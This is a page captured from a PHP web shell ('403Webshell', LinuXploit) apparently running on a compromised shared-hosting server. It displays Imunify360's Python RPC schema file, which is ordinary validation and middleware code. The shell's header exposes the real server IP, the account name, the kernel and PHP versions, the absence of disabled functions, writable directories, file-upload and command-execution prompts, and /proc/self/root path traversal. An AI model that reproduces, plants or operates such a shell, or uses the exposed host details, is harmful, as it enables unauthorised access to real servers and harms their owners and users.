403Webshell
Server IP : 66.29.132.122  /  Your IP : 3.12.74.138
Web Server : LiteSpeed
System : Linux business142.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : admazpex ( 531)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/opt/imunify360/venv/lib64/python3.11/site-packages/defence360agent/simple_rpc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/opt/imunify360/venv/lib64/python3.11/site-packages/defence360agent/simple_rpc/schema.py
from cerberus.errors import BaseErrorHandler, BasicErrorHandler

from defence360agent.contracts.config import UserType
from defence360agent.rpc_tools.middleware import (
    add_eula,
    add_license,
    add_license_user,
    add_version,
    collect_warnings,
    counts,
    default_to_items,
    max_count,
    preserve_remote_addr,
    send_command_invoke_message,
)
from defence360agent.rpc_tools.utils import prepare_schema


class ErrorHandler(BaseErrorHandler):
    messages = BasicErrorHandler.messages.copy()

    def collect_errors(self, error):
        if error.child_errors:
            for err in error.child_errors:
                yield from self.collect_errors(err)
        else:
            # avoid abstract error: required field
            yield "field: '{}', value: '{}', error: {}".format(
                error.field,
                error.value,
                self.messages.get(error.code, "").format(
                    *error.info,
                    constraint=error.constraint,
                    field=error.field,
                    value=error.value
                ),
            )

    def __call__(self, errors):
        string_representation = []
        for error in errors:
            for info in self.collect_errors(error):
                string_representation.append(info)

        return string_representation


def init_validator(schema_validator, validate_middleware, schema_paths):
    _validator = schema_validator(
        prepare_schema(schema_paths),
        error_handler=ErrorHandler,
    )

    # NOTE: it is processed in the reversed order, see _apply_middleware
    _middleware = {
        None: [
            (send_command_invoke_message, (UserType.ROOT, UserType.NON_ROOT)),
            # validation before processing the data
            (
                validate_middleware(_validator),
                (UserType.ROOT, UserType.NON_ROOT),
            ),
            # inject license for root
            (add_license, (UserType.ROOT,)),
            # inject license for regular user
            (add_license_user, (UserType.NON_ROOT,)),
            # inject eula
            (add_eula, (UserType.ROOT,)),
            # inject version
            (add_version, (UserType.ROOT, UserType.NON_ROOT)),
            # add warnings if any
            (collect_warnings, (UserType.ROOT, UserType.NON_ROOT)),
            # for backward compatibility
            (default_to_items, (UserType.ROOT, UserType.NON_ROOT)),
        ],
        ("whitelist", "ip", "list"): [
            (counts, (UserType.ROOT, UserType.NON_ROOT))
        ],
        ("blacklist", "ip", "list"): [
            (max_count, (UserType.ROOT, UserType.NON_ROOT))
        ],
        ("graylist", "ip", "list"): [
            (counts, (UserType.ROOT, UserType.NON_ROOT))
        ],
        ("whitelist", "ip", "add"): [
            (preserve_remote_addr, (UserType.ROOT, UserType.NON_ROOT))
        ],
        ("blacklist", "ip", "add"): [
            (preserve_remote_addr, (UserType.ROOT, UserType.NON_ROOT))
        ],
        ("whitelist", "country", "list"): [
            (max_count, (UserType.ROOT, UserType.NON_ROOT))
        ],
        ("blacklist", "country", "list"): [
            (max_count, (UserType.ROOT, UserType.NON_ROOT))
        ],
        ("graylist", "country", "list"): [
            (max_count, (UserType.ROOT, UserType.NON_ROOT))
        ],
        ("blacklist",): [(counts, (UserType.ROOT, UserType.NON_ROOT))],
        ("whitelisted-crawlers", "list"): [
            (max_count, (UserType.ROOT, UserType.NON_ROOT))
        ],
        ("blocked-port", "list"): [
            (counts, (UserType.ROOT, UserType.NON_ROOT))
        ],
        ("blocked-port-ip", "list"): [
            (max_count, (UserType.ROOT, UserType.NON_ROOT))
        ],
        ("rules", "list-disabled"): [
            (max_count, (UserType.ROOT, UserType.NON_ROOT))
        ],
        ("proactive", "ignore", "list"): [
            (max_count, (UserType.ROOT, UserType.NON_ROOT))
        ],
        ("feature-management", "show"): [
            (max_count, (UserType.ROOT, UserType.NON_ROOT))
        ],
        ("ip-list", "synced"): [(counts, (UserType.ROOT, UserType.NON_ROOT))],
        ("ip-list", "local", "list"): [
            (counts, (UserType.ROOT, UserType.NON_ROOT))
        ],
        ("ip-list", "local", "add"): [
            (preserve_remote_addr, (UserType.ROOT, UserType.NON_ROOT))
        ],
        ("ip-list", "local", "delete"): [
            (preserve_remote_addr, (UserType.ROOT, UserType.NON_ROOT))
        ],
    }

    _middleware_exclude = {
        ("enable-plugin",): [add_eula],
        ("disable-plugin",): [add_eula],
        ("install-vendors",): [add_eula],
        ("uninstall-vendors",): [add_eula],
        ("add-sudouser",): [add_eula],
        ("delete-sudouser",): [add_eula],
        ("doctor",): [add_eula],
        ("captcha", "update-localizations"): [add_eula],
        ("captcha", "compile-localizations"): [add_eula],
        ("update",): [add_eula],
        ("kcarectl", "disable-auto-update"): [add_eula],
        ("kcarectl", "enable-auto-update"): [add_eula],
        ("kcarectl", "plugin-info"): [add_eula],
        ("register",): [add_eula],
        ("unregister",): [add_eula],
        ("rstatus",): [add_eula],
        ("update-license",): [add_eula],
        ("3rdparty", "list"): [add_eula],
        ("admin-emails",): [add_eula],
        ("list-docroots",): [add_eula],
        ("features", "list"): [add_eula],
        ("features", "status"): [add_eula],
        ("features", "install"): [add_eula],
        ("features", "remove"): [add_eula],
        ("feature-management", "native", "enable"): [add_eula],
        ("feature-management", "native", "disable"): [add_eula],
        ("feature-management", "native", "status"): [add_eula],
        ("import", "wblist"): [add_eula],
        ("rules", "update-app-specific-rules"): [add_eula],
        ("support", "send"): [add_eula],
        ("3rdparty", "conflicts"): [add_eula],
        ("smtp-blocking", "reset"): [add_eula],
        ("smtp-blocking", "sync"): [add_eula],
        ("malware", "on-demand", "check-detached"): [add_eula],
        ("checkdb",): [add_eula],
        ("restore-configs",): [add_eula],
    }

    return _validator, _middleware, _middleware_exclude

Youez - 2016 - github.com/yon3zu
LinuXploit